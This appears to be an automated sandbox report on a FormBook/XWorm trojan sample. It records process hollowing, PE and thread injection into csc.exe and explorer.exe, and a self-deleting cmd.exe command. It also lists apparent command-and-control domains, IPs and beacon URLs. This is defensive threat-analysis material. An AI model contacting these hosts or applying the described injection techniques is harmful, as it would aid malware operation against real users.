          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7F380 mov eax, dword ptr fs:[00000030h]3_2_05C7F380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7F380 mov eax, dword ptr fs:[00000030h]3_2_05C7F380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7F380 mov eax, dword ptr fs:[00000030h]3_2_05C7F380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7F380 mov eax, dword ptr fs:[00000030h]3_2_05C7F380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C7F380 mov eax, dword ptr fs:[00000030h]3_2_05C7F380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8A390 mov eax, dword ptr fs:[00000030h]3_2_05C8A390
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8A390 mov eax, dword ptr fs:[00000030h]3_2_05C8A390
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8A390 mov eax, dword ptr fs:[00000030h]3_2_05C8A390
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05D1F38A mov eax, dword ptr fs:[00000030h]3_2_05D1F38A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C693A6 mov eax, dword ptr fs:[00000030h]3_2_05C693A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C693A6 mov eax, dword ptr fs:[00000030h]3_2_05C693A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CDC3B0 mov eax, dword ptr fs:[00000030h]3_2_05CDC3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C58347 mov eax, dword ptr fs:[00000030h]3_2_05C58347
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C58347 mov eax, dword ptr fs:[00000030h]3_2_05C58347
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C58347 mov eax, dword ptr fs:[00000030h]3_2_05C58347
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9A350 mov eax, dword ptr fs:[00000030h]3_2_05C9A350
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6B360 mov eax, dword ptr fs:[00000030h]3_2_05C6B360
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6B360 mov eax, dword ptr fs:[00000030h]3_2_05C6B360
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6B360 mov eax, dword ptr fs:[00000030h]3_2_05C6B360
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6B360 mov eax, dword ptr fs:[00000030h]3_2_05C6B360
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6B360 mov eax, dword ptr fs:[00000030h]3_2_05C6B360
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C6B360 mov eax, dword ptr fs:[00000030h]3_2_05C6B360
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9E363 mov eax, dword ptr fs:[00000030h]3_2_05C9E363
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9E363 mov eax, dword ptr fs:[00000030h]3_2_05C9E363
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9E363 mov eax, dword ptr fs:[00000030h]3_2_05C9E363
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9E363 mov eax, dword ptr fs:[00000030h]3_2_05C9E363
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9E363 mov eax, dword ptr fs:[00000030h]3_2_05C9E363
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9E363 mov eax, dword ptr fs:[00000030h]3_2_05C9E363
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9E363 mov eax, dword ptr fs:[00000030h]3_2_05C9E363
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C9E363 mov eax, dword ptr fs:[00000030h]3_2_05C9E363
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05C8237A mov eax, dword ptr fs:[00000030h]3_2_05C8237A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CDE372 mov eax, dword ptr fs:[00000030h]3_2_05CDE372
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CDE372 mov eax, dword ptr fs:[00000030h]3_2_05CDE372
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CDE372 mov eax, dword ptr fs:[00000030h]3_2_05CDE372
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CDE372 mov eax, dword ptr fs:[00000030h]3_2_05CDE372
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CE0371 mov eax, dword ptr fs:[00000030h]3_2_05CE0371
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_05CE0371 mov eax, dword ptr fs:[00000030h]3_2_05CE0371
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D1949C GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,5_2_00D1949C
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F60B64C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF72F60B64C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D22000 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00D22000
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D226B0 SetUnhandledExceptionFilter,5_2_00D226B0

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 172.66.0.70 80Jump to behavior
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: NULL target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: NULL target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread register set: target process: 4828Jump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 4828Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeSection unmapped: C:\Program Files (x86)\Internet Explorer\iexplore.exe base address: 400000Jump to behavior
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base address: 400000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: D10000Jump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 5429008Jump to behavior
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"Jump to behavior
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D1C9F6 AllocateAndInitializeSid,GetLastError,AllocateAndInitializeSid,GetLastError,GetLengthSid,GetProcessHeap,HeapAlloc,InitializeAcl,GetLastError,AddAccessAllowedAce,GetLastError,AddAccessAllowedAce,GetLastError,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,AllocateAndInitializeSid,GetLastError,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,IsValidSecurityDescriptor,GetLastError,GetProcessHeap,HeapFree,FreeSid,FreeSid,FreeSid,5_2_00D1C9F6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 5_2_00D1C9F6 AllocateAndInitializeSid,GetLastError,AllocateAndInitializeSid,GetLastError,GetLengthSid,GetProcessHeap,HeapAlloc,InitializeAcl,GetLastError,AddAccessAllowedAce,GetLastError,AddAccessAllowedAce,GetLastError,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,AllocateAndInitializeSid,GetLastError,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,IsValidSecurityDescriptor,GetLastError,GetProcessHeap,HeapFree,FreeSid,FreeSid,FreeSid,5_2_00D1C9F6
          Source: explorer.exe, 00000004.00000002.11881693560.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.6843158548.0000000000F60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000002.11884668589.0000000004590000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11890837892.000000000CF26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11881693560.0000000000F60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.11881693560.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.6843158548.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.11880835641.0000000000820000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.11881693560.0000000000F60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.6843158548.0000000000F60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: GetLocaleInfoEx,0_2_00007FF72F638FB0
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: GetLocaleInfoEx,0_2_00007FF72F639080
          Source: C:\Users\user\Desktop\kHslwiV2w6.exeCode function: 0_2_00007FF72F5B0030 GetSystemTimeAsFileTime,0_2_00007FF72F5B0030

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kHslwiV2w6.exe.1ed0971ad88.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kHslwiV2w6.exe.1ed0958d6f0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kHslwiV2w6.exe.1ed0971ad88.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kHslwiV2w6.exe.1ed0958d6f0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.6908193624.0000000005F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.11880642057.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.6907188311.0000000005BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.11881186452.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.11881283456.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.6838996006.000001ED09400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Command and Scripting Interpreter          		1
          DLL Side-Loading          		1
          Access Token Manipulation          		3
          Virtualization/Sandbox Evasion          		OS Credential Dumping1
          System Time Discovery          		Remote Services11
          Archive Collected Data          		2
          Encrypted Channel          		Exfiltration Over Other Network Medium1
          Data Encrypted for Impact
          CredentialsDomainsDefault Accounts2
          Native API          		Boot or Logon Initialization Scripts812
          Process Injection          		1
          Access Token Manipulation          		LSASS Memory131
          Security Software Discovery          		Remote Desktop ProtocolData from Removable Media2
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Shared Modules          		Logon Script (Windows)1
          DLL Side-Loading          		812
          Process Injection          		Security Account Manager3
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Deobfuscate/Decode Files or Information          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
          Obfuscated Files or Information          		LSA Secrets1
          Application Window Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Software Packing          		Cached Domain Credentials113
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529053 Sample: kHslwiV2w6.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 32 www.yeslabs.xyz 2->32 34 www.woby.xyz 2->34 36 32 other IPs or domains 2->36 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 52 3 other signatures 2->52 11 kHslwiV2w6.exe 1 2->11         started        signatures3 50 Performs DNS queries to domains with low reputation 34->50 process4 signatures5 62 Writes to foreign memory regions 11->62 64 Allocates memory in foreign processes 11->64 66 Sample uses process hollowing technique 11->66 68 Injects a PE file into a foreign processes 11->68 14 csc.exe 11->14         started        17 conhost.exe 11->17         started        19 iexplore.exe 11->19         started        process6 signatures7 70 Modifies the context of a thread in another process (thread injection) 14->70 72 Maps a DLL or memory area into another process 14->72 74 Sample uses process hollowing technique 14->74 76 2 other signatures 14->76 21 explorer.exe 50 1 14->21 injected process8 dnsIp9 38 ext-sq.squarespace.com 198.185.159.144, 49740, 49745, 80 SQUARESPACEUS United States 21->38 40 ssl1.prod.systemdragon.com 104.18.188.223, 49738, 80 CLOUDFLARENETUS United States 21->40 42 3 other IPs or domains 21->42 54 System process connects to network (likely due to code injection or exploit) 21->54 25 raserver.exe 21->25         started        signatures10 process11 signatures12 56 Modifies the context of a thread in another process (thread injection) 25->56 58 Maps a DLL or memory area into another process 25->58 60 Switches to a custom stack to bypass stack traces 25->60 28 cmd.exe 1 25->28         started        process13 process14 30 conhost.exe 28->30         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          kHslwiV2w6.exe47%ReversingLabsWin64.Trojan.XWorm

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          parkingpage.namecheap.com
          		91.195.240.19
          		truetrue
            		unknown
            www.tigajco69.fun
            		172.67.143.211
            		truetrue
              		unknown
              www.coinbureau.xyz
              		13.248.169.48
              		truetrue
                		unknown
                proxy-ssl-geo.webflow.com
                		52.206.163.162
                		truetrue
                  		unknown
                  andrewghita.com
                  		172.66.0.70
                  		truetrue
                    		unknown
                    webuyandsellpa.com
                    		63.141.128.16
                    		truetrue
                      		unknown
                      localhomeservicesadvisor.com
                      		3.33.130.190
                      		truetrue
                        		unknown
                        www.pittsparking.com
                        		104.247.81.174
                        		truetrue
                          		unknown
                          www.qqkartel88v1.com
                          		172.67.130.46
                          		truetrue
                            		unknown
                            www.wshifen.com
                            		103.235.47.188
                            		truetrue
                              		unknown
                              ssl1.prod.systemdragon.com
                              		104.18.188.223
                              		truetrue
                                		unknown
                                ext-sq.squarespace.com
                                		198.185.159.144
                                		truetrue
                                  		unknown
                                  www.woby.xyz
                                  		13.248.252.114
                                  		truetrue
                                    		unknown
                                    equipoleiremnacional.com
                                    		192.250.227.27
                                    		truetrue
                                      		unknown
                                      www.localhomeservicesadvisor.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.j3k7n.xyz
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.piedge-taiko.net
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.vizamag.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.jalaios10.vip
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.attorney-services-8344642.zone
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.webuyandsellpa.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.upcyclecharms.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.rakring.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.saeutah.com
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.chiri.lat
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.equipoleiremnacional.com
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown
                                                              www.rslotrank.win
                                                              		unknown
                                                              		unknowntrue
                                                                		unknown
                                                                www.zruypj169g.top
                                                                		unknown
                                                                		unknowntrue
                                                                  		unknown
                                                                  www.z8ggd.com
                                                                  		unknown
                                                                  		unknowntrue
                                                                    		unknown
                                                                    www.andrewghita.com
                                                                    		unknown
                                                                    		unknowntrue
                                                                      		unknown
                                                                      www.yeslabs.xyz
                                                                      		unknown
                                                                      		unknowntrue
                                                                        		unknown

                                                                        Contacted URLs

                                                                        NameMaliciousAntivirus DetectionReputation
                                                                        http://www.attorney-services-8344642.zone/md02/?all=VJE6G0uhaXXjZ9YRdQlMdfAmJtBHOO9P9ftsD0Za8iws3BCdMQRNDr5e7yfdzu876eSq&P6=6lUxOJCX68zXYtrue
                                                                          		unknown
                                                                          http://www.andrewghita.com/md02/?all=h80NDNStJT1K2TvWS0Hn00m/568InfN4qw4a/Ot4iW3ni2fqEGOFCNj8nYFszZLP0eyh&P6=6lUxOJCX68zXYtrue
                                                                            		unknown
                                                                            http://www.yeslabs.xyz/md02/?all=PFllZ1wBFT+zd6wAz/9Wh67A0WfaovzBimzeDVQv10BU1t/rlxqvwJuzFJn/ILzX+D6Y&P6=6lUxOJCX68zXYtrue
                                                                              		unknown
                                                                              http://www.upcyclecharms.com/md02/?all=Huvb14uAl+TqSP+sM2oBgNUO4U2JwQZ3Rl/9gDSI5Y6jcOUTIOoj4XqjJyA8WIhVJbwk&P6=6lUxOJCX68zXYtrue
                                                                                		unknown

                                                                                URLs from Memory and Binaries

                                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/MostlyCloudyNight.pnexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://www.msn.com/en-us/news/politics/chris-christie-former-trump-debate-coach-offers-key-pieces-oexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://www.equipoleiremnacional.comReferer:explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://www.rslotrank.winexplorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#kHslwiV2w6.exefalse
                                                                                          		unknown
                                                                                          http://www.coinbureau.xyzexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://www.z8ggd.com/md02/www.qqkartel88v1.comexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvWexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://www.msn.com/en-us/money/markets?id=a3oxnmexplorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://www.chiri.latReferer:explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://android.notify.windows.com/iOSPexplorer.exe, 00000004.00000003.8285449351.0000000010BEC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6858022237.0000000010BA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287825721.0000000010C9D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11897707281.0000000010C91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8286577674.0000000010C83000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000004.00000002.11890837892.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11886221151.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6847520157.00000000091C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.6852064723.000000000CE47000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://www.hecxion.xyz/md02/www.woby.xyzexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          http://www.j3k7n.xyzexplorer.exe, 00000004.00000003.8285280689.0000000010D7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8287567470.0000000010DBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8624923083.0000000010DD4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.11898558035.0000000010DD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.8622429467.0000000010DC5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		unknown
